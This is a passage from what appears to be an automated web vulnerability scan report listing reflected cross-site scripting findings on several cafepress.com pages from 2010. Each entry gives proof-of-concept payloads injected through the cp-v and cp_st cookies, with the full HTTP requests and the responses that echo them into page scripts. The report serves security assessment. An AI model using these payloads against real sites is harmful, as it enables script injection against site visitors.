__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 59029
Date: Sun, 26 Dec 2010 13:49:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/
Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '65868</script><script>alert(1)</script>67d717b073a'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.56. http://www.cafepress.com/+posters [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+posters

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ddf8"-alert(1)-"05b70d2df26 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+posters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 65624
Date: Sun, 26 Dec 2010 13:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/
Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.57. http://www.cafepress.com/+posters [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+posters

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c66</script><script>alert(1)</script>78957873d50 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+posters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c0c66</script><script>alert(1)</script>78957873d50; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 65646
Date: Sun, 26 Dec 2010 13:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/
Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'c0c66</script><script>alert(1)</script>78957873d50'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+stadium-blanket

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a90"-alert(1)-"b637a8bd2b7 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+stadium-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59457
Date: Sun, 26 Dec 2010 13:49:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/
Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+stadium-blanket

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71ca1</script><script>alert(1)</script>6e6e4d328ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+stadium-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=71ca1</script><script>alert(1)</script>6e6e4d328ee; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59474
Date: Sun, 26 Dec 2010 13:49:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '71ca1</script><script>alert(1)</script>6e6e4d328ee'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.60. http://www.cafepress.com/+steins [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+steins

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 747f7"-alert(1)-"1bd54518006 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+steins HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 58697
Date: Sun, 26 Dec 2010 13:47:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
